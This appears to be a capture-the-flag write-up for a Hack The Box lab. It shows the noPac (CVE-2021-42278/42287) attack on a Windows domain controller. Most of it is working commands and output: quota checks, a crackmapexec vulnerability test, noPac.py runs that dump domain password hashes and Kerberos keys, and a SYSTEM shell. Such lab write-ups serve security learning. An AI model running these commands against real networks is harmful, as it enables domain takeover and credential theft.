CVE-2021-42278/CVE-2021-42287
The target system might be vulnerable to the CVE-2021-42278 +CVE-2021-42287 chain attack given the fact it is relatively older and doesn’t seem to have patch installed for it
By default, any domain user has the SeMachineAccountPrivilege privilege enabled and I have already confirmed that the svc-printer user has the privileges enabled
Additionally, users with the privilege can add up to 10 devices to the domain. This can be checked both locally and remotely
*evil-winrm* ps c:\tmp> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
distinguishedname : DC=return,DC=local
ms-ds-machineaccountquota : 10
name : return
objectclass : domainDNS
objectguid : d3137589-2523-4e02-8c2e-98b4fa01e413Notice the ms-DS-MachineAccountQuota attribute set to 10
┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ ldapsearch -x -h ldap://return.local -D 'svc-printer@return.local' -w '1edFg43012!!' -b 'DC=RETURN,DC=LOCAL' -LLL | grep -w ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10Through ldapsearch, it can also be checked remotely
exploit (nopac)
The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller through faking a computer account with the trailing $ sign
Testing
┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ cme smb $IP -d RETURN.LOCAL --kdcHost printer.return.local -u svc-printer -p '1edFg43012!!' -M nopac
smb 10.10.11.108 445 printer [*] windows 10.0 build 17763 x64 (name:PRINTER) (domain:RETURN.LOCAL) (signing:True) (SMBv1:False)
smb 10.10.11.108 445 printer [+] return.local\svc-printer:1edFg43012!!
NOPAC 10.10.11.108 445 PRINTER TGT with PAC size 1483
NOPAC 10.10.11.108 445 PRINTER TGT without PAC size 718
NOPAC 10.10.11.108 445 PRINTER
NOPAC 10.10.11.108 445 PRINTER VULNEABLE
nopac 10.10.11.108 445 printer next step: https://github.com/Ridter/noPaccrackmapexec has a module available to test for the nopac exploit above As the result shown above, the target system is confirmed to be vulnerable
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/return/noPac]
└─$ python3 noPac.py 'return.local/svc-printer:1edFg43012!!' --impersonate administrator -dc-ip $IP -use-ldap -dump -just-dc
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target printer.return.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-BTT8JH9ZU7D$"
[*] MachineAccount "WIN-BTT8JH9ZU7D$" password = vUswK8d#GGW#
[*] Successfully added machine account WIN-BTT8JH9ZU7D$ with password vUswK8d#GGW#.
[*] WIN-BTT8JH9ZU7D$ object = CN=WIN-BTT8JH9ZU7D,CN=Computers,DC=return,DC=local
[*] WIN-BTT8JH9ZU7D$ sAMAccountName == printer
[*] Saving a DC's ticket in printer.ccache
[*] Reseting the machine account to WIN-BTT8JH9ZU7D$
[*] Restored WIN-BTT8JH9ZU7D$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_printer.return.local.ccache
[*] Attempting to del a computer with the name: WIN-BTT8JH9ZU7D$
[-] Delete computer WIN-BTT8JH9ZU7D$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:efb65b83b414ea32e6ed711633871917:::
WIN-BTT8JH9ZU7D$:6101:aad3b435b51404eeaad3b435b51404ee:d5a1639e71af144a93e7921063ba4965:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
Administrator:aes128-cts-hmac-sha1-96:ef8673c4ba668752432c817dda62af48
Administrator:des-cbc-md5:4f0ee6291aabd338
krbtgt:aes256-cts-hmac-sha1-96:cc6ddaa28d2bb97926dabd1b82845479a97080aad93eddfd2ccf4f2ddf00961a
krbtgt:aes128-cts-hmac-sha1-96:cc5f4a49b6a0cdb71cdea34e84ba2a2e
krbtgt:des-cbc-md5:1086497c1fc1ab8a
return.local\svc-printer:aes256-cts-hmac-sha1-96:6dd6f85d0cf31eb1c01d7aff4e30a58bc5948e6f05e6d88f5cdb57be0208117d
return.local\svc-printer:aes128-cts-hmac-sha1-96:a92bc84131dcd4309431242e8ee9437e
return.local\svc-printer:des-cbc-md5:574cb9a8a8e5cb43
PRINTER$:aes256-cts-hmac-sha1-96:8ad926efb270eb570b27b3df1d5974e3510b063dfe4719c936596661dd8044f7
PRINTER$:aes128-cts-hmac-sha1-96:c4f7bc24dacca04acf119d1c2ab4cb87
PRINTER$:des-cbc-md5:2a3df408ea080716
WIN-BTT8JH9ZU7D$:aes256-cts-hmac-sha1-96:41597db8d62a1e39d29298137422439151e47414f145dc3000129a86f6e4b67e
WIN-BTT8JH9ZU7D$:aes128-cts-hmac-sha1-96:95bbe6e763622f64d61a6bc2d2931417
WIN-BTT8JH9ZU7D$:des-cbc-md5:ba6b13fe5b310d68
[*] Cleaning up...
[*] Stopping service RemoteRegistryDomain Level Compromise
Pass-the-ticket technique with the -k flag was not successful
Shelldrop
┌──(kali㉿kali)-[~/…/htb/labs/return/noPac]
└─$ python3 nopac.py 'return.local/svc-printer:1edFg43012!!' -dc-ip $IP -use-ldap -shell
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target printer.return.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-UPQBCAW6CI8$"
[*] MachineAccount "WIN-UPQBCAW6CI8$" password = je8Za^8s&1yz
[*] Successfully added machine account WIN-UPQBCAW6CI8$ with password je8Za^8s&1yz.
[*] WIN-UPQBCAW6CI8$ object = CN=WIN-UPQBCAW6CI8,CN=Computers,DC=return,DC=local
[*] WIN-UPQBCAW6CI8$ sAMAccountName == printer
[*] Saving a DC's ticket in printer.ccache
[*] Reseting the machine account to WIN-UPQBCAW6CI8$
[*] Restored WIN-UPQBCAW6CI8$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_printer.return.local.ccache
[*] attempting to del a computer with the name: WIN-UPQBCAW6CI8$
[-] Delete computer WIN-UPQBCAW6CI8$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
printer
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::1a2
ipv6 address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
link-local ipv6 address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
ipv4 address. . . . . . . . . . . : 10.10.11.108
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
10.10.10.2System Level Compromise